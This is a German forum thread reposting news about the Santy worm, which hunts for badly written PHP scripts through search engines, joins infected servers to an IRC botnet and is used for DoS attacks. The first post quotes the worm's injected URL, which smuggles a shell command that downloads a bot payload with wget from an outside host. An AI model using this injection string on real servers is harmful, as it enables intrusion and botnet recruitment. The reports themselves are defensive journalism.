Thema: Wurm attackiert PHP-Skripte

[SiLæncer]

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich.

http://www.heise.de/security/news/meldung/54612

heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:

Code: [Auswählen]

http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget www.visualcoders.net/spybot.txt;
Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.

heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.

Quelle : www.heise.de

[SiLæncer]

Der in der vergegangenen Woche aufgetauchte Santy-Wurm hat seine Angriffsstrategie geändert. Die erste Variante hatte es auf Web-Seiten abgesehen, bei denen das Forensystem phpBB zum Einsatz kommt. Um diese Seiten ausfindig zu machen, nutzte der Wurm die Suchmaschine Google. Google konnte seinerzeit die Ausbreitung des Wurms schnell stoppen.

Binnen weniger Tage sind jetzt allerdings gleich mehrere Weiterentwicklungen des Wurms Santy aufgetaucht. Santy.C und Santy.E attackieren nicht mehr nur Internet-Seiten mit phpBB, sondern generell Seiten, die in der Script-Sprache PHP programmiert wurden. Um es genauer zu sagen: Der Wurm hat es auf schlecht in PHP programmierte Seiten abgesehen.

Über Google, Yahoo und AOL versucht der Wurm zunächst Seiten zu ermitteln, die in PHP geschrieben wurden und in denen die Funktionen "include()" und "require()" vorkommen. Diese Funktionen werden dazu genutzt, um den Inhalt von Dateien auf einer Website anzuzeigen. Wenn der Programmierer die an diese Funktion übergebenen Parameter im Code nicht sorgfältig genug überprüft, kann ein Angreifer diese Funktion mißbrauchen und im Extremfall die gesamte Kontrolle über den Webserver übernehmen.

Die französischen Sicherheitsexperten von K-OTik Security empfehlen, PHP-Seiten, in denen die beiden genannten Funktionen vorkommen, so umzuprogrammieren, dass die beiden Funktionen auf eine sichere Art und Weise verwendet werden.

Quelle : www.pcwelt.de